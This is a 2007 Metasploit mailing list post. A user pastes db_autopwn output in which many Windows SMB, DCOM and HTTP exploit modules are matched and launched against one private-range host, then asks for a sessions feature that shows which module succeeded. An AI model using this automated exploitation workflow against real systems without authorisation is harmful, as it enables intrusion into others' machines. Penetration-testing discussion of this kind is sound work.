Metasploit mailing list archives

db_autopwn - What module succeded ?


From: andres.riancho at gmail.com (Andres Riancho)
Date: Fri, 14 Dec 2007 09:48:09 -0300

List,

    I'm playing with db_autopwn and after some tries I got it working
and successfully exploited four different vulnerabilities on four
different machines. What I get as a response of the "db_autopwn"
command is something like this:

[*] Analysis completed in 3.19079804420471 seconds (0 vulns / 0 refs)
[*] Matched auxiliary/dos/windows/smb/rras_vls_null_deref against
172.20.6.39:445...
[*] Matched exploit/windows/smb/ms04_031_netdde against 172.20.6.39:445...
[*] Launching exploit/windows/smb/ms04_031_netdde (2/17) against
172.20.6.39:445...
[*] Started bind handler
[*] Matched exploit/windows/smb/ms04_011_lsass against 172.20.6.39:445...
[*] Launching exploit/windows/smb/ms04_011_lsass (3/17) against
172.20.6.39:445...
[*] Started bind handler
[*] Matched exploit/solaris/samba/trans2open against 172.20.6.39:139...
[*] Launching exploit/solaris/samba/trans2open (4/17) against 172.20.6.39:139...
[*]  >> Exception during launch from exploit/solaris/samba/trans2open:
A target has not been selected.
[*] Matched exploit/windows/smb/ms05_039_pnp against 172.20.6.39:445...
[*] Launching exploit/windows/smb/ms05_039_pnp (5/17) against 172.20.6.39:445...
[*] Started bind handler
[*] Connecting to the SMB service...
[*] Matched exploit/windows/dcerpc/ms03_026_dcom against 172.20.6.39:135...
[*] Launching exploit/windows/dcerpc/ms03_026_dcom (6/17) against
172.20.6.39:135...
[*] Started bind handler
[*] Matched exploit/osx/samba/trans2open against 172.20.6.39:139...
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Matched exploit/windows/smb/ms06_025_rasmans_reg against 172.20.6.39:445...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:172.20.6.39[135]
...
[*] Matched exploit/windows/http/sybase_easerver against 172.20.6.39:8080...
[*] Launching exploit/windows/http/sybase_easerver (9/17) against
172.20.6.39:8080...
...
...
many more lines ...

    After that I use "sessions -l" to list all available sessions, and
neither the above log , nor the session information tells me what
module successfully exploited which host! Is there a way to know this
? If not, I want to do a feature request that allows me to get this
info with the sessions command.

Cheers,
-- 
Andres Riancho
http://w3af.sourceforge.net/
Web Application Attack and Audit Framework



Current thread: